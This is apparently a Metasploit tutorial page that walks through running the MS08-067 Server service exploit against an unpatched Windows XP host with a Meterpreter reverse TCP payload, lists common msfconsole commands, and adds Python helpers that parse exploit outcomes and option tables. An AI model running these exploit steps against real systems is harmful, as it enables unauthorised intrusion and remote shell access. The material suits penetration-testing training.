Metasploit


general example

Running an exploit against the Server service (netapi) on a Windows XP host.
This works against unpatched Windows XP SP3 hosts...

# msfconsole

[snipped some info output]

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 10.0.my.host
LHOST => 10.0.my.host
msf  exploit(ms08_067_netapi) > set RHOST 10.0.victim.host
RHOST => 10.0.victim.host

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.my.host:4444
[-] Exploit exception: The connection timed out (10.0.victim.host:445).
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) >

and, as you can see, the host is patched ;-)

explaining the output:

  1. start msfconsole
  2. search for the vulnerability/exploit ms08_067 and get the full path of the exploit module
  3. select the exploit with use
  4. set the local IP address (the attacking host's IP) with LHOST
  5. set the remote IP address (the victim host) with RHOST
  6. set the payload to send to the victim host to windows/meterpreter/reverse_tcp,
     which opens a reverse TCP connection back to the attacking host
  7. start the exploit with exploit

if the exploit was successful, you will get a prompt like this:

meterpreter> 
meterpreter> shell
[snipped output of starting windows cmd]
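The transcript above shows two of the three outcomes a run can end with (handler started, then either a timeout or a Meterpreter prompt). When msfconsole output is logged or driven from a script, it helps to classify those outcome lines mechanically. The following Python is an added example, not part of the original page and not part of Metasploit. The sample output strings are constructed to mirror the transcript, the hostnames stay placeholders, and the wording of the "session opened" and "Sending stage" lines is assumed to follow msfconsole's usual messages. One point worth keeping in mind when reading the result: a TCP timeout on port 445, as in the transcript, means the SMB port never answered (filtered, firewalled or host down), which is a different outcome from a reachable target whose run ends with only "Exploit completed, but no session was created".

```python
"""Classify the outcome of a msfconsole exploit run from its console output.

Added example, not from the original page and not part of Metasploit.
The sample output is constructed to mirror the transcript on this page;
hostnames are placeholders.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the failed run shown on this page (port 445 timed out).
SAMPLE_TIMEOUT = """\
[*] Started reverse handler on 10.0.my.host:4444
[-] Exploit exception: The connection timed out (10.0.victim.host:445).
[*] Exploit completed, but no session was created.
"""

# Constructed sample: a reachable target that did not yield a session.
SAMPLE_NO_SESSION = """\
[*] Started reverse handler on 10.0.my.host:4444
[*] Automatically detecting the target...
[*] Exploit completed, but no session was created.
"""

# Constructed sample: a successful run (line wording assumed to follow msfconsole).
SAMPLE_SESSION = """\
[*] Started reverse handler on 10.0.my.host:4444
[*] Sending stage (752128 bytes) to 10.0.victim.host
[*] Meterpreter session 1 opened (10.0.my.host:4444 -> 10.0.victim.host:1034)
"""

HANDLER_RE = re.compile(r"^\[\*\] Started reverse handler on (?P<addr>\S+):(?P<port>\d+)")
TIMEOUT_RE = re.compile(r"^\[-\] Exploit exception: The connection timed out \((?P<target>.+):(?P<port>\d+)\)\.?$")
SESSION_RE = re.compile(r"^\[\*\] Meterpreter session (?P<id>\d+) opened")
NO_SESSION_RE = re.compile(r"^\[\*\] Exploit completed, but no session was created\.")


@dataclass
class ExploitResult:
    status: str                 # "session", "unreachable", "no_session" or "unknown"
    detail: str
    handler: Optional[str] = None
    session_id: Optional[int] = None


def classify_exploit_output(text: str) -> ExploitResult:
    """Scan the output once and return the most specific outcome found."""
    handler = None
    session_id = None
    timed_out = None
    no_session = False
    for line in text.splitlines():
        line = line.strip()
        if (m := HANDLER_RE.match(line)):
            handler = f"{m.group('addr')}:{m.group('port')}"
        elif (m := SESSION_RE.match(line)):
            session_id = int(m.group("id"))
        elif (m := TIMEOUT_RE.match(line)):
            timed_out = f"{m.group('target')}:{m.group('port')}"
        elif NO_SESSION_RE.match(line):
            no_session = True

    if session_id is not None:
        return ExploitResult("session", f"Meterpreter session {session_id} opened", handler, session_id)
    if timed_out:
        # A TCP timeout means the port never answered: filtered, firewalled or host down.
        # It says nothing about whether the target is patched.
        return ExploitResult("unreachable", f"no connection to {timed_out}; port filtered or host down", handler)
    if no_session:
        return ExploitResult("no_session", "target reached, but the exploit produced no session", handler)
    return ExploitResult("unknown", "no recognised outcome line in output", handler)


if __name__ == "__main__":
    for name, sample in (("timeout", SAMPLE_TIMEOUT), ("no session", SAMPLE_NO_SESSION), ("session", SAMPLE_SESSION)):
        print(name, "->", classify_exploit_output(sample))
```

The three regexes are anchored on the `[*]`/`[-]` prefixes so that an unrelated line containing the word "session" (for example in a module description) cannot be mistaken for an outcome line.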


useful commands

some useful commands...


search for a specific exploit

search ms08_067


show available exploits

show exploits


show all payloads

show payloads


show info about an exploit

info exploit exploit/windows/smb/ms08_067_netapi


show info about a payload

info payload windows/meterpreter/reverse_tcp


show options

if an exploit and/or payload is already selected, it displays their options:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) >
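A pre-flight check a practitioner would want before typing exploit: parse the `show options` table and list every required option that still has no current setting (in the table above that is RHOST and LHOST, exactly the two options set by hand earlier on this page). The following Python is an added example, not part of the original page and not part of Metasploit. Its sample input is the `show options` output above, embedded as a constructed string; column boundaries are read from the dashed ruler line under each header, since the setting column can be empty and the description column contains spaces.

```python
"""Parse the output of msfconsole's `show options` and flag unset required options.

Added example, not from the original page and not part of Metasploit.
The sample text below is laid out like the `show options` transcript on this page.
"""
import re

# Constructed sample, copied in layout from the transcript on this page.
SAMPLE_SHOW_OPTIONS = """\
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
"""

SECTION_RE = re.compile(r"^(Module|Payload) options \((?P<name>[^)]+)\):")


def parse_show_options(text):
    """Return {module_or_payload_name: {option: {"setting", "required", "description"}}}.

    Column starts are taken from the dashed ruler under each header, because
    the description column contains spaces and the setting column may be empty.
    """
    sections = {}
    current = None
    cols = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        m = SECTION_RE.match(line)
        if m:
            current = sections.setdefault(m.group("name"), {})
            cols = None
            continue
        if not line.startswith(" "):
            # Any other unindented line ("Exploit target:", the prompt) ends the table.
            current = None
            continue
        if current is None:
            continue
        if re.fullmatch(r"[-\s]+", line):
            # Ruler line: each run of dashes marks where a column starts.
            cols = [mm.start() for mm in re.finditer(r"-+", line)]
            continue
        if cols is None:
            continue  # the "Name  Current Setting ..." header row precedes the ruler
        fields = []
        for i, start in enumerate(cols):
            end = cols[i + 1] if i + 1 < len(cols) else len(line)
            fields.append(line[start:end].strip())
        name, setting, required, description = (fields + [""] * 4)[:4]
        current[name] = {
            "setting": setting,
            "required": required.lower() == "yes",
            "description": description,
        }
    return sections


def missing_required(sections):
    """List (section, option) pairs that are required but still have no setting."""
    return [
        (section, option)
        for section, options in sections.items()
        for option, info in options.items()
        if info["required"] and not info["setting"]
    ]


if __name__ == "__main__":
    parsed = parse_show_options(SAMPLE_SHOW_OPTIONS)
    for section, option in missing_required(parsed):
        print(f"{section}: required option {option} is not set")
```

Run stand-alone, the script reports RHOST under the exploit module and LHOST under the payload; the "Exploit target" table is deliberately skipped because it is not an options table.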